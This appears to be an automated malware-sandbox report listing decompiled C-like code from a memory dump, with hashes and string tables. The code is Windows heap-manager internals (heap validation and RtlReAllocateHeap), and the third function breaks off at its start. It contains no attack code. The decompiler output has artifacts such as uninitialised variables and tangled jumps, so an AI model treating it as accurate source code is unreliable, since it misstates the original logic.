                                  • API String ID: 0-4009184096
                                  • Opcode ID: fb04ee6f5c4e108ef3618afd202f11531e643d79c26cc351df19f13643340ffd
                                  • Instruction ID: 48e8325c92dcbc691af539bd4883e42daf4d67d69a5bdcf822c250ad8ec5dd8c
                                  • Opcode Fuzzy Hash: fb04ee6f5c4e108ef3618afd202f11531e643d79c26cc351df19f13643340ffd
                                  • Instruction Fuzzy Hash: 940229F29002289FDF61DF54CC84AEAB7B9BF49305F4445EAA609A7211E7309E84CF5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E0264098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int* _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int* _t165;
                                  				intOrPtr _t168;
                                  				signed short _t181;
                                  				intOrPtr _t183;
                                  				signed int* _t204;
                                  				signed int _t209;
                                  				signed int _t214;
                                  				signed int* _t216;
                                  				signed int _t226;
                                  				signed int _t228;
                                  				signed int _t233;
                                  				intOrPtr _t235;
                                  				intOrPtr _t246;
                                  				intOrPtr _t257;
                                  				signed int _t280;
                                  				signed int* _t281;
                                  				signed int* _t282;
                                  				signed short _t284;
                                  				signed short _t286;
                                  				signed char _t288;
                                  				intOrPtr* _t298;
                                  				signed int _t309;
                                  				signed int _t310;
                                  				signed int* _t311;
                                  				unsigned int _t312;
                                  				signed int* _t313;
                                  				signed int _t314;
                                  				signed int _t315;
                                  				intOrPtr _t316;
                                  				signed int _t317;
                                  				signed int _t318;
                                  				signed int _t319;
                                  
                                  				_t308 = __edx;
                                  				_t311 = _a4;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_v16 = _t311;
                                  				if(E0263FB7A(__ecx, __edx, _t311, 0) == 0) {
                                  					L84:
                                  					E026406F9(_v16);
                                  					_t337 = _v8;
                                  					if(_v8 != 0) {
                                  						_a4 = _a4 & 0x00000000;
                                  						E025A4167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                  					}
                                  					L48:
                                  					return 0;
                                  				}
                                  				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
                                  					_t308 = 0;
                                  					_t165 =  &(_t311[0x31]);
                                  					_t280 =  *_t165;
                                  					_a8 = 0;
                                  					_v24 = 0;
                                  					while(_t165 != _t280) {
                                  						_t280 =  *_t280;
                                  						_a4 =  *_t313 & 0x0000ffff;
                                  						_t288 = _t313[0];
                                  						_v16 = _t313;
                                  						__eflags = _t288 & 0x00000001;
                                  						if((_t288 & 0x00000001) != 0) {
                                  							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  							__eflags =  *(_t168 + 0xc);
                                  							if( *(_t168 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E025E373B();
                                  							} else {
                                  								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push(_t313);
                                  							E025E373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
                                  							L22:
                                  							__eflags = _t311[0x13];
                                  							if(_t311[0x13] != 0) {
                                  								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
                                  								 *_t313 =  *_t313 ^ _t311[0x14];
                                  							}
                                  							goto L84;
                                  						}
                                  						_t181 =  *_t313 & 0x0000ffff;
                                  						__eflags = _t181 - _v24;
                                  						if(_t181 < _v24) {
                                  							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  							__eflags =  *(_t183 + 0xc);
                                  							if( *(_t183 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E025E373B();
                                  							} else {
                                  								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							E025E373B("Non-Dedicated free list element %p is out of order\n", _t313);
                                  							goto L22;
                                  						}
                                  						_t308 = 0;
                                  						_v24 = _t181 & 0x0000ffff;
                                  						__eflags = _t311[0x13];
                                  						if(_t311[0x13] != 0) {
                                  							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
                                  							 *_t313 =  *_t313 ^ _t311[0x14];
                                  							__eflags =  *_t313;
                                  						}
                                  						_t29 =  &_a8;
                                  						 *_t29 = _a8 + 1;
                                  						__eflags =  *_t29;
                                  						_t165 =  &(_t311[0x31]);
                                  					}
                                  					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
                                  					if( *0x26792a4 != 0 && _t311[0x30] != _t308) {
                                  						_push(4);
                                  						_push(0x1000);
                                  						_push( &_a4);
                                  						_push(0);
                                  						_push( &_v8);
                                  						if(E0258FAD0(0xffffffff) >= 0) {
                                  							_v12 = _v8 + 0x204;
                                  						}
                                  					}
                                  					_t204 =  &(_t311[0x28]);
                                  					_t314 =  *_t204;
                                  					while(_t204 != _t314) {
                                  						__eflags = _t311[0x13];
                                  						_t281 = _t314 + 0x18;
                                  						if(_t311[0x13] != 0) {
                                  							 *_t281 =  *_t281 ^ _t311[0x14];
                                  							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
                                  							if(__eflags != 0) {
                                  								_push(0);
                                  								_push(_t281);
                                  								_push(_t311);
                                  								E0263F8EE(_t281, _t311, _t314, __eflags);
                                  							}
                                  						}
                                  						_t295 = _v12;
                                  						__eflags = _t295;
                                  						if(_t295 == 0) {
                                  							L39:
                                  							__eflags =  *(_t314 + 0x1a) & 0x00000004;
                                  							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
                                  								L41:
                                  								__eflags = _t311[0x13];
                                  								if(_t311[0x13] != 0) {
                                  									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
                                  									 *_t281 =  *_t281 ^ _t311[0x14];
                                  									__eflags =  *_t281;
                                  								}
                                  								_t314 =  *_t314;
                                  								_t204 =  &(_t311[0x28]);
                                  								continue;
                                  							}
                                  							_t209 = E0262579A(_t295, _t311, _t281);
                                  							__eflags = _t209;
                                  							if(_t209 == 0) {
                                  								__eflags = _t311[0x13];
                                  								if(_t311[0x13] != 0) {
                                  									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
                                  									_t95 = _t314 + 0x18;
                                  									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
                                  									__eflags =  *_t95;
                                  								}
                                  								goto L48;
                                  							}
                                  							goto L41;
                                  						} else {
                                  							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
                                  							__eflags = _t214;
                                  							if(_t214 == 0) {
                                  								goto L39;
                                  							}
                                  							__eflags = _t214 & 0x00008000;
                                  							if((_t214 & 0x00008000) == 0) {
                                  								__eflags = _t214 & 0x00000800;
                                  								if((_t214 & 0x00000800) != 0) {
                                  									goto L39;
                                  								}
                                  								__eflags = _t214 - _t311[0x22];
                                  								if(_t214 >= _t311[0x22]) {
                                  									goto L39;
                                  								}
                                  								L38:
                                  								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
                                  								_t295 =  *(_t314 + 0x10) >> 3;
                                  								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
                                  								__eflags =  *_t216;
                                  								goto L39;
                                  							}
                                  							_t214 = _t214 & 0x00007fff;
                                  							_t295 = 0x81;
                                  							__eflags = _t214 - 0x81;
                                  							if(_t214 >= 0x81) {
                                  								goto L39;
                                  							}
                                  							_t295 = _v8;
                                  							goto L38;
                                  						}
                                  					}
                                  					_v20 = _v20 & 0x00000000;
                                  					_v24 = _v24 & 0x00000000;
                                  					_t282 =  &(_t311[0x2a]);
                                  					_t315 =  *_t282;
                                  					while(_t315 != _t282) {
                                  						_t226 = L0263FDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
                                  						__eflags = _t226;
                                  						if(_t226 == 0) {
                                  							goto L84;
                                  						}
                                  						_t315 =  *_t315;
                                  					}
                                  					_t316 = _a8;
                                  					_v16 = _t311;
                                  					if(_t316 == _v20) {
                                  						__eflags = _t311[0x1e] - _v24;
                                  						if(_t311[0x1e] == _v24) {
                                  							_t228 = _v8;
                                  							__eflags = _t228;
                                  							if(_t228 == 0) {
                                  								goto L74;
                                  							}
                                  							_t317 = _t311[0x30];
                                  							__eflags = _t317;
                                  							if(_t317 == 0) {
                                  								L68:
                                  								_t318 = _t311[0x23];
                                  								__eflags = _t318;
                                  								if(__eflags == 0) {
                                  									L73:
                                  									_a4 = 0;
                                  									E025A4167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                  									goto L74;
                                  								}
                                  								_t233 = _t311[0x22] & 0x0000ffff;
                                  								_t284 = 1;
                                  								_t308 = 1;
                                  								__eflags = 1 - _t233;
                                  								if(__eflags >= 0) {
                                  									goto L73;
                                  								}
                                  								_t312 = _v12;
                                  								while(1) {
                                  									_t309 = _t284 & 0x0000ffff;
                                  									_t308 =  *(_t312 + _t309 * 4);
                                  									_t318 = _t318 + 0x40;
                                  									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
                                  									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
                                  										break;
                                  									}
                                  									_t284 = _t284 + 1;
                                  									__eflags = _t284 - _t233;
                                  									if(__eflags < 0) {
                                  										continue;
                                  									}
                                  									goto L73;
                                  								}
                                  								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *(_t235 + 0xc);
                                  								if( *(_t235 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E025E373B();
                                  								} else {
                                  									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
                                  								_push(_t298);
                                  								_push( *_t298);
                                  								_t319 = _t318 + 0x10;
                                  								__eflags = _t319;
                                  								_push( *((intOrPtr*)(_t319 - 8)));
                                  								_push(_t319);
                                  								E025E373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
                                  								goto L84;
                                  							}
                                  							_t286 = 1;
                                  							__eflags = 1;
                                  							while(1) {
                                  								_t310 = _t286 & 0x0000ffff;
                                  								_t308 =  *(_t228 + _t310 * 4);
                                  								_t317 = _t317 + 0xc;
                                  								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
                                  								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
                                  									break;
                                  								}
                                  								_t286 = _t286 + 1;
                                  								_t308 = 0x81;
                                  								__eflags = _t286 - 0x81;
                                  								if(_t286 < 0x81) {
                                  									continue;
                                  								}
                                  								goto L68;
                                  							}
                                  							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  							__eflags =  *(_t246 + 0xc);
                                  							if( *(_t246 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E025E373B();
                                  							} else {
                                  								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
                                  							_push( *((intOrPtr*)(_t317 + 8)));
                                  							E025E373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
                                  							goto L84;
                                  						}
                                  						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  						__eflags =  *(_t257 + 0xc);
                                  						if( *(_t257 + 0xc) == 0) {
                                  							_push("HEAP: ");
                                  							E025E373B();
                                  						} else {
                                  							E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  						}
                                  						_push(_t311[0x1e]);
                                  						_push(_v24);
                                  						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
                                  						L57:
                                  						E025E373B();
                                  						goto L84;
                                  					}
                                  					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
                                  						_push("HEAP: ");
                                  						E025E373B();
                                  					} else {
                                  						E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push(_t316);
                                  					_push(_v20);
                                  					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                  					goto L57;
                                  				} else {
                                  					L74:
                                  					return 1;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                  • API String ID: 0-3316276410
                                  • Opcode ID: cb02b9ed1e5404c788051d56f356bb80f1ba9b13dbf6dd1921043d7c224cbe03
                                  • Instruction ID: af5b8eae04508ab4f29a4b67b04c375901826044ba3f4dd40486033dc1410e4c
                                  • Opcode Fuzzy Hash: cb02b9ed1e5404c788051d56f356bb80f1ba9b13dbf6dd1921043d7c224cbe03
                                  • Instruction Fuzzy Hash: A1F1DF71500665EFEB28DF24C480FAABBF5FF05718F048099E9C69B281DB30AA45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E02641238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t123;
                                  				signed int _t124;
                                  				void* _t130;
                                  				intOrPtr _t132;
                                  				signed int _t145;
                                  				signed int _t146;
                                  				signed int _t147;
                                  				intOrPtr _t151;
                                  				intOrPtr _t163;
                                  				signed int _t173;
                                  				signed int _t174;
                                  				signed int _t178;
                                  				short _t184;
                                  				signed int _t193;
                                  				signed int _t194;
                                  				intOrPtr _t197;
                                  				intOrPtr _t219;
                                  				short* _t233;
                                  				void* _t246;
                                  				intOrPtr _t248;
                                  				signed int _t251;
                                  				signed int _t253;
                                  				signed int _t254;
                                  				void* _t255;
                                  				void* _t256;
                                  
                                  				_t246 = __edx;
                                  				_push(0x18);
                                  				_push(0x259d158);
                                  				_t123 = E0259DF5C(__ebx, __edi, __esi);
                                  				_t248 =  *((intOrPtr*)(_t255 + 8));
                                  				 *((intOrPtr*)(_t255 + 8)) = _t248;
                                  				 *((char*)(_t255 - 0x19)) = 0;
                                  				 *(_t255 - 0x24) = 0;
                                  				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
                                  					 *(_t255 - 4) = 0;
                                  					 *(_t255 - 4) = 1;
                                  					_t232 = "RtlReAllocateHeap";
                                  					_t124 = E025A85CA(_t248, "RtlReAllocateHeap");
                                  					__eflags = _t124;
                                  					if(_t124 != 0) {
                                  						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
                                  						_t251 =  *(_t255 + 0x14);
                                  						__eflags = _t251;
                                  						if(_t251 == 0) {
                                  							_t235 = 1;
                                  							__eflags = 1;
                                  						} else {
                                  							_t235 = _t251;
                                  						}
                                  						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
                                  						__eflags = _t130 - _t251;
                                  						if(_t130 < _t251) {
                                  							L66:
                                  							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  							__eflags =  *(_t132 + 0xc);
                                  							if( *(_t132 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E025E373B();
                                  							} else {
                                  								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push( *((intOrPtr*)(_t248 + 0x7c)));
                                  							E025E373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
                                  							E026406F9(0);
                                  							_t117 = _t255 - 0x24;
                                  							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
                                  							__eflags =  *_t117;
                                  							goto L71;
                                  						} else {
                                  							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
                                  							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
                                  								goto L66;
                                  							}
                                  							__eflags =  *(_t255 + 0xc) & 0x00000001;
                                  							if(__eflags == 0) {
                                  								E025922D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
                                  								 *((char*)(_t255 - 0x19)) = 1;
                                  								_t26 = _t255 + 0xc;
                                  								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
                                  								__eflags =  *_t26;
                                  							}
                                  							E0264098E(_t235, _t246, _t248, 0);
                                  							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
                                  							__eflags =  *((char*)(_t253 + 7)) - 5;
                                  							if( *((char*)(_t253 + 7)) == 5) {
                                  								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
                                  								__eflags = _t253;
                                  							}
                                  							_t145 = E025D0ED7(_t235, _t248, _t253, _t232);
                                  							__eflags = _t145;
                                  							if(_t145 == 0) {
                                  								L52:
                                  								_t146 =  *(_t255 - 0x24);
                                  								__eflags = _t146;
                                  								if(_t146 == 0) {
                                  									L71:
                                  									_t119 = _t255 - 4;
                                  									 *_t119 =  *(_t255 - 4) & 0x00000000;
                                  									__eflags =  *_t119;
                                  									 *(_t255 - 4) = 0xfffffffe;
                                  									E026416C3();
                                  									_t123 =  *(_t255 - 0x24);
                                  									goto L72;
                                  								}
                                  								__eflags = _t146 -  *0x2677928; // 0x0
                                  								if(__eflags != 0) {
                                  									_t147 = E025A8131();
                                  									__eflags = _t147 & 0x00000800;
                                  									if((_t147 & 0x00000800) == 0) {
                                  										goto L71;
                                  									}
                                  									__eflags =  *(_t255 - 0x20) -  *0x267792c; // 0x0
                                  									if(__eflags != 0) {
                                  										goto L71;
                                  									}
                                  									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x267792e; // 0x0
                                  									if(__eflags != 0) {
                                  										goto L71;
                                  									}
                                  									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  									__eflags =  *(_t151 + 0xc);
                                  									if( *(_t151 + 0xc) == 0) {
                                  										_push("HEAP: ");
                                  										E025E373B();
                                  									} else {
                                  										E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  									}
                                  									_push(E0262F719(_t248,  *(_t255 - 0x20)));
                                  									_push( *(_t255 + 0x14));
                                  									E025E373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
                                  									L58:
                                  									E026406F9(0);
                                  									goto L71;
                                  								}
                                  								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *(_t163 + 0xc);
                                  								if( *(_t163 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E025E373B();
                                  								} else {
                                  									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push( *(_t255 + 0x14));
                                  								E025E373B("Just reallocated block at %p to %x bytes\n",  *0x2677928);
                                  								goto L58;
                                  							} else {
                                  								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0x2677928; // 0x0
                                  								if(__eflags != 0) {
                                  									_t173 = E025A8131();
                                  									__eflags = _t173 & 0x00000800;
                                  									if((_t173 & 0x00000800) == 0) {
                                  										L37:
                                  										_t174 = E025AC7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
                                  										 *(_t255 - 0x24) = _t174;
                                  										__eflags = _t174;
                                  										if(_t174 != 0) {
                                  											_t70 = _t174 - 8; // -8
                                  											_t254 = _t70;
                                  											__eflags =  *((char*)(_t254 + 7)) - 5;
                                  											if( *((char*)(_t254 + 7)) == 5) {
                                  												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
                                  												__eflags = _t254;
                                  											}
                                  											__eflags =  *(_t248 + 0x4c);
                                  											if( *(_t248 + 0x4c) != 0) {
                                  												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                  												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
                                  												if(__eflags != 0) {
                                  													_push(0);
                                  													_push(_t254);
                                  													_push(_t248);
                                  													E0263F8EE(_t232, _t248, _t254, __eflags);
                                  												}
                                  											}
                                  											__eflags =  *(_t254 + 2) & 0x00000002;
                                  											if(( *(_t254 + 2) & 0x00000002) == 0) {
                                  												_t178 =  *(_t254 + 3) & 0xff;
                                  											} else {
                                  												_t233 = E025C2568(_t254);
                                  												__eflags =  *(_t248 + 0x40) & 0x08000000;
                                  												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
                                  													_t184 = 0;
                                  													__eflags = 0;
                                  												} else {
                                  													_t184 = E02639AF6();
                                  												}
                                  												 *_t233 = _t184;
                                  												_t178 =  *(_t233 + 2) & 0x0000ffff;
                                  											}
                                  											 *(_t255 - 0x20) = _t178;
                                  											__eflags =  *(_t248 + 0x4c);
                                  											if( *(_t248 + 0x4c) != 0) {
                                  												_t235 =  *(_t254 + 2) & 0x000000ff;
                                  												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
                                  												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                  												__eflags =  *_t254;
                                  											}
                                  										}
                                  										E0263FB7A(_t235, _t246, _t248, 1);
                                  										E0264098E(_t235, _t246, _t248, 0);
                                  										goto L52;
                                  									}
                                  									_t232 = 0;
                                  									__eflags =  *0x267792c - _t232; // 0x0
                                  									if(__eflags == 0) {
                                  										goto L37;
                                  									}
                                  									__eflags =  *(_t248 + 0x4c);
                                  									if( *(_t248 + 0x4c) != 0) {
                                  										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                  										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
                                  										if(__eflags != 0) {
                                  											_push(0);
                                  											_push(_t253);
                                  											_push(_t248);
                                  											E0263F8EE(0, _t248, _t253, __eflags);
                                  										}
                                  									}
                                  									__eflags =  *(_t253 + 2) & 0x00000002;
                                  									if(( *(_t253 + 2) & 0x00000002) == 0) {
                                  										_t193 =  *(_t253 + 3) & 0xff;
                                  									} else {
                                  										_t193 =  *(E025C2568(_t253) + 2) & 0x0000ffff;
                                  									}
                                  									 *(_t255 - 0x20) = _t193;
                                  									__eflags =  *(_t248 + 0x4c) - _t232;
                                  									if( *(_t248 + 0x4c) != _t232) {
                                  										_t235 =  *(_t253 + 2) & 0x000000ff;
                                  										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
                                  										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                  										__eflags =  *_t253;
                                  									}
                                  									_t194 =  *(_t255 - 0x20);
                                  									__eflags = _t194 - _t232;
                                  									if(_t194 != _t232) {
                                  										__eflags = _t194 -  *0x267792c; // 0x0
                                  										if(__eflags != 0) {
                                  											goto L37;
                                  										}
                                  										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0x267792e; // 0x0
                                  										if(__eflags != 0) {
                                  											goto L37;
                                  										}
                                  										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
                                  										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
                                  											_push("HEAP: ");
                                  											E025E373B();
                                  										} else {
                                  											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  										}
                                  										_pop(_t235);
                                  										_push(E0262F719(_t248,  *(_t255 - 0x20)));
                                  										_push( *(_t255 + 0x14));
                                  										E025E373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
                                  										_t256 = _t256 + 0x10;
                                  										_push(_t232);
                                  										L36:
                                  										E026406F9();
                                  									}
                                  									goto L37;
                                  								}
                                  								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  								__eflags =  *(_t219 + 0xc);
                                  								if( *(_t219 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E025E373B();
                                  								} else {
                                  									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_pop(_t235);
                                  								_push( *(_t255 + 0x14));
                                  								E025E373B("About to reallocate block at %p to %x bytes\n",  *0x2677928);
                                  								_t256 = _t256 + 0xc;
                                  								_push(0);
                                  								goto L36;
                                  							}
                                  						}
                                  					}
                                  					 *(_t255 - 0x24) = 0;
                                  					goto L71;
                                  				} else {
                                  					_push( *(_t255 + 0x14));
                                  					_push( *((intOrPtr*)(_t255 + 0x10)));
                                  					_push( *(_t255 + 0xc));
                                  					_push(_t248);
                                  					E0263E765();
                                  					L72:
                                  					return E0259DFA1(_t123);
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-3744532478
                                  • Opcode ID: a27c97ed79c903942fdf080f34963eb3d8189d92f9b578b946717c9ad70876df
                                  • Instruction ID: 747cca93b70174da72ecdcc46948d65827f9794caff58e31a0ab731543f8ddaf
                                  • Opcode Fuzzy Hash: a27c97ed79c903942fdf080f34963eb3d8189d92f9b578b946717c9ad70876df
                                  • Instruction Fuzzy Hash: 34C1F671500655AFEB26DF64C845BBABBF1BF0A714F048088F8CA97641CB34E985CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E025AE6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t254;
                                  				signed int _t257;
                                  				signed int _t258;
                                  				signed int _t260;
                                  				signed int _t261;
                                  				signed int _t263;
                                  				signed int _t288;
                                  				signed int _t290;
                                  				signed int _t299;
                                  				intOrPtr _t300;
                                  				intOrPtr _t303;
                                  				intOrPtr _t304;
                                  				intOrPtr* _t319;
                                  				intOrPtr* _t320;
                                  				intOrPtr* _t321;
                                  				intOrPtr _t324;
                                  				signed int _t328;
                                  				intOrPtr _t331;
                                  				intOrPtr* _t332;
                                  				signed short _t333;
                                  				signed int _t336;
                                  				intOrPtr _t347;
                                  				signed int _t348;
                                  				intOrPtr _t355;
                                  				signed int _t376;
                                  				signed int _t378;
                                  				signed int _t380;
                                  				signed short* _t388;
                                  				signed short* _t390;
                                  				signed int _t391;
                                  				signed int _t401;
                                  				intOrPtr _t403;
                                  				intOrPtr* _t405;
                                  				signed int _t406;
                                  				intOrPtr _t407;
                                  				signed int _t410;
                                  				signed int _t411;
                                  				intOrPtr* _t414;
                                  				intOrPtr* _t416;
                                  				signed int _t417;
                                  				intOrPtr* _t418;
                                  				void* _t419;
                                  				void* _t421;
                                  				void* _t422;
                                  
                                  				_push(0xb4);
                                  				_push(0x259be58);
